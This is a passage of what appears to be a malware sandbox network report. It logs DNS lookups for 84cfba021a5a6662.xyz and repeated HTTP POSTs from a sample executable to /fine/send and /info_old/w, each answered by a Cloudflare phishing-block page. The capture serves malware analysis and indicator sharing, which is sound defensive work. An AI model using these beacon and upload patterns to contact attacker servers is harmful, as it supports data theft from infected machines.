Jan 29, 2021 17:53:06.320732117 CET	56338	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:06.377552032 CET	53	56338	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:06.840539932 CET	59420	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:06.896950006 CET	53	59420	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:07.478343964 CET	58784	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:07.534740925 CET	53	58784	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:08.222661972 CET	63978	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:08.278804064 CET	53	63978	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:08.775001049 CET	62938	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:08.833486080 CET	53	62938	8.8.8.8	192.168.2.3
Jan 29, 2021 17:55:11.291529894 CET	55708	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:55:11.351280928 CET	53	55708	8.8.8.8	192.168.2.3
Jan 29, 2021 17:55:11.855205059 CET	56803	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:55:11.929464102 CET	53	56803	8.8.8.8	192.168.2.3
Jan 29, 2021 17:55:12.874376059 CET	57145	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:55:12.939282894 CET	53	57145	8.8.8.8	192.168.2.3
Jan 29, 2021 17:55:13.513290882 CET	55359	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:55:13.572453976 CET	53	55359	8.8.8.8	192.168.2.3
Jan 29, 2021 17:55:13.864360094 CET	58306	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:55:13.920917034 CET	53	58306	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 29, 2021 17:50:33.568248987 CET	192.168.2.3	8.8.8.8	0xd6f9	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:42.404350042 CET	192.168.2.3	8.8.8.8	0x2566	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:43.736141920 CET	192.168.2.3	8.8.8.8	0x50f5	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:51:18.288214922 CET	192.168.2.3	8.8.8.8	0xda98	Standard query (0)	84CFBA021A5A6662.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 29, 2021 17:50:33.624427080 CET	8.8.8.8	192.168.2.3	0xd6f9	No error (0)	84cfba021a5a6662.xyz		104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:33.624427080 CET	8.8.8.8	192.168.2.3	0xd6f9	No error (0)	84cfba021a5a6662.xyz		172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:42.452200890 CET	8.8.8.8	192.168.2.3	0x2566	No error (0)	84cfba021a5a6662.xyz		104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:42.452200890 CET	8.8.8.8	192.168.2.3	0x2566	No error (0)	84cfba021a5a6662.xyz		172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:43.792432070 CET	8.8.8.8	192.168.2.3	0x50f5	No error (0)	84cfba021a5a6662.xyz		104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:50:43.792432070 CET	8.8.8.8	192.168.2.3	0x50f5	No error (0)	84cfba021a5a6662.xyz		172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:51:18.346786022 CET	8.8.8.8	192.168.2.3	0xda98	No error (0)	84CFBA021A5A6662.xyz		104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:51:18.346786022 CET	8.8.8.8	192.168.2.3	0xda98	No error (0)	84CFBA021A5A6662.xyz		172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:55:11.351280928 CET	8.8.8.8	192.168.2.3	0x7091	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

84cfba021a5a6662.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49714	104.21.23.16	80	C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:50:33.686583996 CET	90	OUT	POST //fine/send HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 82 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:33.749600887 CET	92	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8b5c77f5c0a3ae92a0d481019c7d64331611939033; expires=Sun, 28-Feb-21 16:50:33 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6ca7d00004c9de628e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=twj0ikml%2FJdKIoWs4zTqp9PYAYhS9jftYQwrgPVPck8Q3RA3CmLor7y11harEzrg611VD7RolrJRV%2FeSE22fmm%2B6Zb3YLVFhP8TtvEabzUAhW0JG0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619473f0cf704c9d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:50:33.773344040 CET	96	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:33.824717999 CET	98	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8b5c77f5c0a3ae92a0d481019c7d64331611939033; expires=Sun, 28-Feb-21 16:50:33 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6cad100004c9dd920f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RNMy%2FNwqjH5q%2F5tjwGA4cysDeYGV1%2BoOpibrwnFnMa7CL2eRmGFOpmg6ZXyNwMK8DUz7sI8xp1GhShwJLCZMiz8MwOMNlaGgoJ0WTlF4wENBo2nLjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619473f148d44c9d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:50:34.017721891 CET	102	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:34.070956945 CET	104	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=df2b47c43f7297bc9fcabac6cc7e62fb51611939034; expires=Sun, 28-Feb-21 16:50:34 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6cbc900004c9dc1880000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=e3%2FB99BdXrNB4aoT%2FL0kJsLjMoC6od6MSTtRTQYKnLEl9oZ4z6rbNwgW3AwqiIw7grj%2Bq3IjnKYDljDY80i3lcZhhxJF0ttuienS1XqHi%2FuZMjPngg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619473f2dce64c9d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:50:36.319972992 CET	109	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:36.372354031 CET	110	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d476fc86be8f72b59d0f4866605259bf51611939036; expires=Sun, 28-Feb-21 16:50:36 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6d4c400004c9dc225e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cvjFp4CnK0WbdobNIOqG%2FHmvmuNxkd7NhI57hIXC4fkEgm0VlJV73oPyeenP5dnUM83yr1Y1QRZ3%2Bwy2FMftzWlHZ2Zegdrqw1xoHOIFIFUIboFzmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619474013a7e4c9d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49715	104.21.23.16	80	C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:50:42.533689022 CET	115	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:42.595381021 CET	117	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=ddd2100047c4e0a0ec090cd39c3b847e71611939042; expires=Sun, 28-Feb-21 16:50:42 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a6ed0b00001eb513313000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2aMbC9fgu%2BBXYLctMNu32pNIk%2F7wFGIwqcryagl1dmG%2F%2BwsWsAwvuTWC3Evbu1NPbnKInkunK20mjyopKYXzRDc1zs31AuOxlDzpBikTHVHZ1AN5Gg%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619474281eed1eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 